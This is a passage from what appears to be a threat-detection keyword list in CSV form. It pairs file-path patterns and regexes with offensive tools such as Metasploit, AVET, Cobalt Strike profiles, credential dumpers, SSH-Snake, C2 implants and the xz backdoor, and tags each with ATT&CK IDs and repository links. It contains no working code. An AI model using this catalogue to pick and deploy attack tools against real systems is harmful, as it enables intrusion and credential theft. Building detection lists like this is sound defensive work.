TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*/auxiliary/scanner/*",".{0,1000}\/auxiliary\/scanner\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/avet.git*",".{0,1000}\/avet\.git.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*/avet_fabric.py*",".{0,1000}\/avet_fabric\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/avet_script_config.sh*",".{0,1000}\/avet_script_config\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*/avoid_badchars.py*",".{0,1000}\/avoid_badchars\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/avred.git*",".{0,1000}\/avred\.git.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/avredweb.py *",".{0,1000}\/avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/awesome-burp-extensions/*",".{0,1000}\/awesome\-burp\-extensions\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/awesome-pentest*",".{0,1000}\/awesome\-pentest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/aws__enum_account*",".{0,1000}\/aws__enum_account.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/aws__enum_account/main.py*",".{0,1000}\/aws__enum_account\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/AWS-Loot*",".{0,1000}\/AWS\-Loot.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/Azure-AccessPermissions.git*",".{0,1000}\/Azure\-AccessPermissions\.git.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*/AzureC2Relay*",".{0,1000}\/AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*/AzureHound.ps1*",".{0,1000}\/AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/B374K*",".{0,1000}\/B374K.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2329","742","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*/BabelStrike.git*",".{0,1000}\/BabelStrike\.git.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*/BabelStrike.py*",".{0,1000}\/BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*/BabyShark.git*",".{0,1000}\/BabyShark\.git.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*/BackDoor*",".{0,1000}\/BackDoor.{0,1000}","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/backdoor.bat*",".{0,1000}\/backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*/backdoor.exe*",".{0,1000}\/backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*/backdoor.py*",".{0,1000}\/backdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" 
"*/backdoor/traitor.go*",".{0,1000}\/backdoor\/traitor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/backdoor_all_users.py*",".{0,1000}\/backdoor_all_users\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/backdoor_apk*",".{0,1000}\/backdoor_apk.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8922","2233","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z" "*/backoff.profile*",".{0,1000}\/backoff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/backorifice-brute.nse*",".{0,1000}\/backorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/backorifice-info.nse*",".{0,1000}\/backorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Backstab.git",".{0,1000}\/Backstab\.git","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/Backstab/Backstab*",".{0,1000}\/Backstab\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/backstab_src/*",".{0,1000}\/backstab_src\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/backupcreds.exe*",".{0,1000}\/backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*/BackupCreds.git*",".{0,1000}\/BackupCreds\.git.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*/BackupOperatorToDA.git*",".{0,1000}\/BackupOperatorToDA\.git.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*/BackupPrivSam/*",".{0,1000}\/BackupPrivSam\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*/bacnet-info.nse*",".{0,1000}\/bacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bad-3-corrupt_lzma2.xz | tr *",".{0,1000}\/bad\-3\-corrupt_lzma2\.xz\s\|\str\s.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: 
https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A" "*/badcert.pem*",".{0,1000}\/badcert\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/badkey.pem*",".{0,1000}\/badkey\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/badrat.ps1*",".{0,1000}\/badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/badrat_cs.exe*",".{0,1000}\/badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/badrat_server.py*",".{0,1000}\/badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# 
implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/badrats.git*",".{0,1000}\/badrats\.git.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/BadZure.git*",".{0,1000}\/BadZure\.git.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*/BadZure/*",".{0,1000}\/BadZure\/.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*/banner.nse*",".{0,1000}\/banner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/BaseNEncoder.cs*",".{0,1000}\/BaseNEncoder\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/bash_completion.d/exegol*",".{0,1000}\/bash_completion\.d\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/bash_executor/*.go",".{0,1000}\/bash_executor\/.{0,1000}\.go","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/bashexplode/boko*",".{0,1000}\/bashexplode\/boko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking 
and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*/Bashfuscator*",".{0,1000}\/Bashfuscator.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*/Bates.csproj*",".{0,1000}\/Bates\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/batik_svg*",".{0,1000}\/batik_svg.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
